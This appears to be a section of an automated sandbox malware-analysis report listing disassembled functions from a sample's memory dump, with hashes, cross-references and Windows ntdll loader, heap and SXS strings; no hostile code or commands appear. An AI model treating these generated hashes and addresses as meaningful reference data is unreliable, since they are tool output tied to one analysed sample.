                                                                            • Instruction ID: e6176d41bf12010c7f9897780b3f280e164d9eb8e7dbc4edec04880d1fa9b13c
                                                                            • Opcode Fuzzy Hash: 87ab31519a228090f6ff25a03d71bd569311c5c833538526eab6cb3f7cf9b32b
                                                                            • Instruction Fuzzy Hash: AB928B71608342AFE721DE29CC90B6BBBE8BBC4754F04492DFA959B350D770E845CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015A68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-3089669407
                                                                            • Opcode ID: c9b9eacce23462d5ed75789f5d9f18dc5e3db7278060c5ac02e528edca0ee72a
                                                                            • Instruction ID: 431656f10976bde990903b4949cff7b7b52843ef855308a982bab61611225ec4
                                                                            • Opcode Fuzzy Hash: c9b9eacce23462d5ed75789f5d9f18dc5e3db7278060c5ac02e528edca0ee72a
                                                                            • Instruction Fuzzy Hash: D0812FB2D1221A7F8B11FA94DDC0EEF7BBEBB447147944426BA11FB110E720ED158BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01655910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01655FE1
                                                                            • @, xrefs: 016563A0
                                                                            • LanguageConfigurationPending, xrefs: 01656221
                                                                            • @, xrefs: 01656027
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0165635D
                                                                            • InstallLanguageFallback, xrefs: 01656050
                                                                            • @, xrefs: 016561B0
                                                                            • LanguageConfiguration, xrefs: 01656420
                                                                            • PreferredUILanguagesPending, xrefs: 016561D2
                                                                            • Control Panel\Desktop, xrefs: 0165615E
                                                                            • PreferredUILanguages, xrefs: 016563D1
                                                                            • @, xrefs: 01656277
                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01655A84
                                                                            • @, xrefs: 0165647A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                            • API String ID: 0-1325123933
                                                                            • Opcode ID: 29871717dfba90662be888772c3e63713ab9301763c304b524f9cedb42ad5ac6
                                                                            • Instruction ID: 9635a46c8e84b8a2b1e2b8a4ae33bb5bd4e22d41b3eaa2f061e68d2025136000
                                                                            • Opcode Fuzzy Hash: 29871717dfba90662be888772c3e63713ab9301763c304b524f9cedb42ad5ac6
                                                                            • Instruction Fuzzy Hash: E67259715083429BD3A5DF28C844B6BBBE9BBC8714F44492EFE86D7250EB34E905CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Critical section debug info address, xrefs: 0162541F, 0162552E
                                                                            • undeleted critical section in freed memory, xrefs: 0162542B
                                                                            • 8, xrefs: 016252E3
                                                                            • corrupted critical section, xrefs: 016254C2
                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01625543
                                                                            • Critical section address., xrefs: 01625502
                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016254CE
                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016254E2
                                                                            • Address of the debug info found in the active list., xrefs: 016254AE, 016254FA
                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0162540A, 01625496, 01625519
                                                                            • Thread identifier, xrefs: 0162553A
                                                                            • Invalid debug info address of this critical section, xrefs: 016254B6
                                                                            • double initialized or corrupted critical section, xrefs: 01625508
                                                                            • Critical section address, xrefs: 01625425, 016254BC, 01625534
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                            • API String ID: 0-2368682639
                                                                            • Opcode ID: 112016fc5c067b170e9eecbe01dbda1dbe8997da9185d47951b074a676e84e1a
                                                                            • Instruction ID: 03f76fa31cba152f8f73f8611b107d398b397c5352935e5a41d9daf365725089
                                                                            • Opcode Fuzzy Hash: 112016fc5c067b170e9eecbe01dbda1dbe8997da9185d47951b074a676e84e1a
                                                                            • Instruction Fuzzy Hash: 9F819AB0A40759AFDF20CF99CC45BAEBBB5BB49704F104119E509BB240D371A941CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016225EB
                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0162261F
                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016222E4
                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01622409
                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01622498
                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01622602
                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016224C0
                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01622506
                                                                            • @, xrefs: 0162259B
                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01622412
                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01622624
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                            • API String ID: 0-4009184096
                                                                            • Opcode ID: 54385310f12f7614720aff4b72b9fa7f643b81ee9c2191840cfb7a88d48e0398
                                                                            • Instruction ID: 4400e64bfa0071926838c914d7d1b73bf9e5bcb13f9f820f869b76c825aaab31
                                                                            • Opcode Fuzzy Hash: 54385310f12f7614720aff4b72b9fa7f643b81ee9c2191840cfb7a88d48e0398
                                                                            • Instruction Fuzzy Hash: 26026FF2D006299BDB35DB54CC84B9AB7B8BB54304F4041EEE60DAB241EB709E94CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                            • API String ID: 0-360209818
                                                                            • Opcode ID: 2eb2b16b47d8b36c1fd1eb4ba47e5dce65965672a31e3c0ac53d584efae4a375
                                                                            • Instruction ID: 13777aaa13c93cc69264a8212610d4f162c55cf45e70b9fab19e10b307f556fa
                                                                            • Opcode Fuzzy Hash: 2eb2b16b47d8b36c1fd1eb4ba47e5dce65965672a31e3c0ac53d584efae4a375
                                                                            • Instruction Fuzzy Hash: 8C629DB1E056298FDB34CF18CC807A9BBB6BF96310F5582DAD549AB240D7725AE1CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01658B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                            • API String ID: 0-2515994595
                                                                            • Opcode ID: 8679e7b3540ced2fb5c7e148fe5dafd99ca1c103e56a1e4421f3324917307f9e
                                                                            • Instruction ID: c037ae6160ebb22f5a72bfbcef77d43eb5ce9835c8ff14525fad16f3ea24b15d
                                                                            • Opcode Fuzzy Hash: 8679e7b3540ced2fb5c7e148fe5dafd99ca1c103e56a1e4421f3324917307f9e
                                                                            • Instruction Fuzzy Hash: 0151BD725143069BD329DF1A8C44BABBBECFF98240F144A1DEE99C7641E770D604CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016612ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                            • API String ID: 0-3591852110
                                                                            • Opcode ID: 3395c206fc367b034a26090237568de560eba1f8c105764c4a3f9aed9c63d443
                                                                            • Instruction ID: e9df4601d17864bb0cb82cf8face986d65b06f8effbde8ca6a935bc16c2c1974
                                                                            • Opcode Fuzzy Hash: 3395c206fc367b034a26090237568de560eba1f8c105764c4a3f9aed9c63d443
                                                                            • Instruction Fuzzy Hash: 4D12BD30600646DFD725DF29C845BBABBF9FF8A714F18845DE4868B652E734E881CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015CAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-3197712848
                                                                            • Opcode ID: daf99545796ecfd740a04a04e20942646a102637bfd380105eb92ea5576f3bf0
                                                                            • Instruction ID: de5eba5c1d2ac27f65a3cf09b47ea9b25b5c78e6fbf5126e2f82cfe06cf7e28a
                                                                            • Opcode Fuzzy Hash: daf99545796ecfd740a04a04e20942646a102637bfd380105eb92ea5576f3bf0
                                                                            • Instruction Fuzzy Hash: C51201716083468FD325DFA8C881BAABBE4BFC4B44F08491DF9959F291E770D944CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015AD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                            • API String ID: 0-3532704233
                                                                            • Opcode ID: 9717039bd91fe2bbd3824decf2d7fb7daf6f7ec38f1c7716f460cbf6b6227532
                                                                            • Instruction ID: d42e2d9e086c2d799c93c05893fa2576d6975ec7f7f24ae4e56afac7c19f7236
                                                                            • Opcode Fuzzy Hash: 9717039bd91fe2bbd3824decf2d7fb7daf6f7ec38f1c7716f460cbf6b6227532
                                                                            • Instruction Fuzzy Hash: 7DB19E715483569FC726EF98C840A6FBBF8BB88744F41492EF989DB240D770DA04CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01660CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                            • API String ID: 0-1357697941
                                                                            • Opcode ID: ec4f6494449d1603c72931b95b724c0a8a51ac45e4f4d8e5df0eefab97e8ac94
                                                                            • Instruction ID: 48306b12b7d63e1e34180be4671de70d373ef17be9088fccd65e5afcb55d1ed5
                                                                            • Opcode Fuzzy Hash: ec4f6494449d1603c72931b95b724c0a8a51ac45e4f4d8e5df0eefab97e8ac94
                                                                            • Instruction Fuzzy Hash: CBF10831A40656EFDB25DF6CC840BBABBF9FF49704F448069F5819B251D730A985CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01660274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 0-1700792311
                                                                            • Opcode ID: f223f675a2b4debc7342591ff6e2fa7fb3e94fd7b60d61558097e22cda8dfde6
                                                                            • Instruction ID: 52b3c683991fd782d9152de5e0f1ce78d42543f09f87cd7d24f3a483a2c5ef90
                                                                            • Opcode Fuzzy Hash: f223f675a2b4debc7342591ff6e2fa7fb3e94fd7b60d61558097e22cda8dfde6
                                                                            • Instruction Fuzzy Hash: 80D1BC35600686DFDB22DF68CC40AADBBF9FF89604F488069F4469B352DB74E981CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • VerifierFlags, xrefs: 01638C50
                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01638B8F
                                                                            • HandleTraces, xrefs: 01638C8F
                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01638A67
                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01638A3D
                                                                            • VerifierDlls, xrefs: 01638CBD
                                                                            • VerifierDebug, xrefs: 01638CA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                            • API String ID: 0-3223716464
                                                                            • Opcode ID: f568dd88aa29bfacc6d1f1decec4efd9f5eeb60e9243564b7f8ccecc75854918
                                                                            • Instruction ID: 53242d816bd9c2f64a659910c5993e400d0014b099820151042299637d23de87
                                                                            • Opcode Fuzzy Hash: f568dd88aa29bfacc6d1f1decec4efd9f5eeb60e9243564b7f8ccecc75854918
                                                                            • Instruction Fuzzy Hash: 949104B2645702AFD721DF688C80B9BBBE9BBD4714F44465CFA426F241C770AC01CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015BEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                            • API String ID: 0-1109411897
                                                                            • Opcode ID: a9c10fe8ba47404e9b1fb5034ec74aa5f0cc40e39dbf55a4266f67196fe9ba00
                                                                            • Instruction ID: 77e2844de6e3487fc5cbf6ca1c617a87a3a5e01156f9ee36f4943dd4f9a4e495
                                                                            • Opcode Fuzzy Hash: a9c10fe8ba47404e9b1fb5034ec74aa5f0cc40e39dbf55a4266f67196fe9ba00
                                                                            • Instruction Fuzzy Hash: 48A21574A0562A8FDB64DF19CC887EDBBB5FB45304F1846EAD909AB254DB309E81CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015AF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-523794902
                                                                            • Opcode ID: 84b8d4cf8c4783a08ddb85a2771a51d540ba097be15afd34ef309e69136d83bb
                                                                            • Instruction ID: 27c6fc5cb7316dacb0447dee2b16e63b264ca783e4234333b48c429983439be0
                                                                            • Opcode Fuzzy Hash: 84b8d4cf8c4783a08ddb85a2771a51d540ba097be15afd34ef309e69136d83bb
                                                                            • Instruction Fuzzy Hash: 6F42E1712487829FD71ADF68C884A6FBBE5FF88704F48896EE5868B391D730D841CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015BADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                            • API String ID: 0-4098886588
                                                                            • Opcode ID: 986119232194291ed713cc23b78ddc29c54ab95cddfff42ef073fe33af285d57
                                                                            • Instruction ID: 61f19e57bca0d958a61155d56beb1d0c739c7bca65fd17ca4ea6e5d271a1b410
                                                                            • Opcode Fuzzy Hash: 986119232194291ed713cc23b78ddc29c54ab95cddfff42ef073fe33af285d57
                                                                            • Instruction Fuzzy Hash: 9D32AF759002698BEF22CF18CC98BEEBBB5BF45350F1441E9E849AB351D7B19E818F50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015CB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                            • API String ID: 0-122214566
                                                                            • Opcode ID: b8b7fb0b06b4d6f129df7e910628cb922d7ee7360889aada1f0115fc15417186
                                                                            • Instruction ID: 833d8570f3a8e1e1439c8e107d8369e6c0713c459934197a30f4c666d96f6ba1
                                                                            • Opcode Fuzzy Hash: b8b7fb0b06b4d6f129df7e910628cb922d7ee7360889aada1f0115fc15417186
                                                                            • Instruction Fuzzy Hash: A9C13A31A002169FDB259FA8CC82B7EBBA9BF45B50F18406DED06AF291DB74DD44C391
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-792281065
                                                                            • Opcode ID: cae39761ab5d5305d4674e0fa0f884cfbcca5375e8e613fa0a596e07d869a573
                                                                            • Instruction ID: 2649d394ef14845cf6e15f4d8643037b10bcae98415b2ad400ec16ab0496cbea
                                                                            • Opcode Fuzzy Hash: cae39761ab5d5305d4674e0fa0f884cfbcca5375e8e613fa0a596e07d869a573
                                                                            • Instruction Fuzzy Hash: FA912471B017229BEB29EF59DC88BAE7BE2BF51B54F54402CD9016F381DB60A801CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01609A2A
                                                                            • apphelp.dll, xrefs: 015A6496
                                                                            • LdrpInitShimEngine, xrefs: 016099F4, 01609A07, 01609A30
                                                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 01609A01
                                                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 016099ED
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01609A11, 01609A3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-204845295
                                                                            • Opcode ID: 69b7b3931449557066300c711eb3948c3c8b5d810316871a8377c05c32da041b
                                                                            • Instruction ID: 4ba773aa8181ce399158e37520080047e8437190e44714cbe6a395d9e2eec378
                                                                            • Opcode Fuzzy Hash: 69b7b3931449557066300c711eb3948c3c8b5d810316871a8377c05c32da041b
                                                                            • Instruction Fuzzy Hash: 6651C0712483059FD725DF24CC41BABBBE9FB84748F84091DF9899B2A1D770E944CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01622178
                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01622160, 0162219A, 016221BA
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01622180
                                                                            • SXS: %s() passed the empty activation context, xrefs: 01622165
                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0162219F
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016221BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
